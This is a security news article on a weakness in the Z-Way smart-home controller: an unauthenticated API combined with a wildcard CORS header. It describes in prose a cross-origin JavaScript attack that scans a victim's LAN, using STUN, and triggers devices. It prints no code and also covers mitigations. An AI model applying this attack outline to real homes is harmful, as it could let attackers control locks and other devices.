A researcher is warning users of the extensible Z-Way controller project that a weakness built into the software could inherently expose it to attacks.
Z-Way is the controller and abstraction layer of software that handles Z-Wave, a standard for wireless communication between devices in smart homes. The standard is present in 35 million devices worldwide, including automated lighting, small appliances, and thermostats.
The protocol transmits input from Z-Wave into an API. That API goes on to feed into web interfaces dealing with the protocol and the Z-Way app, on Android and iOS, according to Randy Westergren, a researcher with XDA Developers who discovered and discussed the weakness in a personal blog post over the weekend.
“I felt it was a serious security risk that was, and still is, mostly unknown to customers,” Westergren warned.
Westergren has dug up vulnerabilities in APIs before, including a privacy issue in TurboTax’s API and a bug in Verizon’s Mobile API that compromised users’ email accounts, earlier this year.
Westergren, who’s in the process of automating his home, stumbled upon the protocol’s lapse in security after purchasing a RaZberry board for a Raspberry Pi. While reviewing web requests for the device the researcher noticed that the protocol uses Angular API to convert information but that the API didn’t require any authentication, instead relying on the user to ensure their own internet is safe.
After looking into the issue further Westergren learned via a RaZberry FAQ that Z-Way comes without authentication by default and that the service encourages users to protect their devices via alternative means, like “ngnix and other reverse proxy servers.”
“It was interesting to find that the vendor was aware of the issue, yet relinquished themselves of dealing with it,” Westergren wrote, “…while a user’s LAN is supposed to be somewhat safe, this doesn’t mean remote attacks are impossible.”
After realizing it was susceptible, Westergren began looking into possible attack methods against the API and deduced that a cross-origin attack could easily compromise the device. This is because a default Cross-Origin Resource Sharing (CORS) header on Z-Way’s web server allows any origin domain, something that can make cross-origin attacks possible according to the researcher. It’s because of this that an attacker could embed malicious Javascript in a page, crawl through subnet hosts, and trigger a Z-Wave operation.
“The victim would have no indication that [the requests] were being performed,” Westergren wrote.
To demonstrate the attack, Westergren put together a script that cycles through hosts attempting to POST to the API. While that POST would ultimately turn on a light switch, the researcher claims the attack is relatively low hanging fruit compared to scripts that could be written to control door locks, garage openers and other devices that can be run via Z-Way.
An attacker could broaden or even refine their target according to Westergren. If the attacker wants to cast a wider net, they can try more default subnets. If they want to narrow their scope, if the victim is using a browser that supports WebRTC, they can make STUN requests to determine a users’ LAN IP.
While the CORS header isn’t exclusively to blame for the attack, it does make it easier and less obvious to the attacker.
“The combination of a lack of authentication and a wildcard origin policy makes an attack easy and transparent to the user,” Westergren told Threatpost Monday.
Westergren doesn’t disagree with Z-Way’s stance that LAN security is the responsibility of the customer but he’s still hoping to warn users that serious risks can result regardless of private LAN segmentation.
“I felt it was important to raise awareness of the customer’s risk in running the software using the default configuration,” Westergren said, adding that he feels Z-Way is underestimating the threat by not securing their devices out of the box.
Users can mitigate the threat to an extent by configuring authentication for Razberry, but the process can be “a little involved” according to Westergren. Still it may be the best option for security-conscious users wishing to deploy Z-Way in home environments.
Those looking to circumvent the way the API handles cross-origin requests can also specify the allowed origin explicitly in the CORS policy, according to Westergren, but that won’t eliminate the threat entirely.
“This weakness in the Z-Way package is fairly targeted,” Westergren said, “It demonstrates the risk of liberal CORS implementations and how they can be exploited by attackers,”
While Z-Wave technology is relatively still in its infancy, other household smart devices, deployed via Bluetooth and WiFi, have been used as a critical attack vector as of late. Last year Kaspersky Lab researcher David Jacoby discovered 22 exploitable vulnerabilities in devices he had connected to his network at home like gaming consoles, televisions and network storage devices.